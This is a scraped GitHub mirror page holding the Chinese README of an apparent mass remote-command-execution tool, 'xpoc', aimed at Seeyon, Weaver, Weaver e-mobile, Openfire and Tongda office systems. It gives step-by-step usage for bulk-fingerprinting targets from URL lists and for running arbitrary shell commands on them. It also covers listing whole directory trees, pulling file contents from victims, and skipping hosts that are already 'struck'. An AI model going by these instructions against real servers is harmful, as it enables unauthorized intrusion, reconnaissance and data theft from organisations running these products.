Giters

9ith4b / xpoc01

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

使用说明

安装依赖环境

centos:

wget https://download.oracle.com/java/20/archive/jdk-20.0.1_linux-x64_bin.rpm
rpm -i jdk-20.0.1_linux-x64_bin.rpm

ubuntu:

wget https://download.oracle.com/java/20/archive/jdk-20.0.1_linux-x64_bin.deb
dpkg -i jdk-20.0.1_linux-x64_bin.deb

参数说明

-u 目标URL

-f 一个存储目标URL列表的文件,每行一个目标URL

-b 获取目标系统的基本信息,这个命令应该第一个被执行

-c 执行的cmd命令

-s 目标系统的shell名,可选的有cmd、sh。(目标系统是windows的情况下使用cmd,Linux则使用sh,一般情况下使用默认)

--cache 是否跳过缓存目标,开启后,已经成功的设备不会再被二次打击

-m 可选择的模块:

  • seeyon(致远)
  • weaver(泛微)
  • openfire
  • weaveremobile(泛微的emobile)
  • tongda(通达)

使用方式

  1. 首先,判断目标设备的操作系统类型

    例如:./xpoc -f targets.txt -m <model> -b,判断目标操作系统的类型

    这一步会生成目标操作系统基本信息文件:basic_xxxx.txt

    targets.txt文件的内容为URL,形如:

    http://127.0.0.1:8890
https://127.0.0.1:9091
...

  2. 探明操作系统后,则执行对应操作系统上的命令,可以使用命令配置文件:

    例如,执行多条命令的配置文件config.json:

    {
    "windows": ["tasklist", "netstat -ano"],
    "linux": ["ps -efw", "netstat -anpt"]
}

    执行单条命令的配置文件config.json:

    {
    "windows": "tasklist",
    "linux": "ps -efw"
}

    像这样使用命令配置文件:./xpoc -f basic_xxxx.txt -m <model> -c f:config.json,使用前面生成的basic_xxxx.txt作为-f的参数,同时-c的参数需要使用f:指定配置文件的路径。

  3. 当然,也可以不使用配置文件

    ./xpoc -f targets.txt -m <model> -c "ps -efw"

    ./xpoc -f targets.txt -m <model> -c "dir \"c:\\Program Files\" "

    注意:如果不使用配置文件,则不需要使用basic_xxxx.txt作为-f的参数;同时注意命令中的"\等需要转义。

注意事项

  1. 如果命令执行的时间过长,如取整个磁盘的文件列表,会导致程序超时无法正确执行,不建议使用
  2. 命令执行的结果保存在output目录中,以目标IP为文件名,多次取证会覆盖同名文件,注意备份保存

特别说明

  1. 当前,泛微(weaver)和致远(seeyon)这两个模块可以使用 -s 参数来修改执行命令的shell,如:

    ./xpoc -m seeyon -u http://192.168.100.250 -s sh -c ls # 目标系统是linux的情况下,可使用-s参数来修改默认的shell

  2. weaveremobile模块支持取文件内容

    ./xpoc -m weaveremobile -u http://192.168.100.250 -d "c:/program files/abc/123"

    注意事项:

    • 不会取目录中的子目录,只会取当前目录下的文件
    • 不要试图取那种目录下有超大、超多的文件的目录,可能会导致程序超时
    • 该功能暂时只支持weaveremobile

  3. openfire的目标系统有windows和linux两种,其中的系统文件有很多,在取文件列表时如果直接进行全磁盘取可能会超时出错,这里建议这样操作:

    # 首先,判断操作系统类型
./xpoc -m openfire -f targets.txt -b    # 执行完后会生成basic_xxxxx.txt
# 从basic_xxxxxx.txt中提取出windows和linux对应的URL

# 对于目标是windows的:
# 注意,windows上需要对特殊符号\和”进行转义: \\和\"
./xpoc -m openfire -f win.txt -c "cmd /c dir c:\\" 		# 首先列出C盘下的文件列表(其他盘符类似)
./xpoc -m openfire -f win.txt -c "cmd /c dir <路径>"	   # 注意路径中的特殊符号需要转义
./xpoc -m openfire -f win.txt -c "cmd /c dir /s <路径>"	   # 注意路径中的特殊符号需要转义,递归列举

# 对于目标是Linux的:
./xpoc -m openfire -f linux.txt -c "ls -laR /usr/bin /usr/sbin /tmp /var /opt"  # 通过指定目录缩小范围

    如果结果文件中有<br>,这是HTML的换行,可以使用notepad++的文件替换功能将其替换为\r\n,便于阅读

About

Languages

Language:Python 100.0%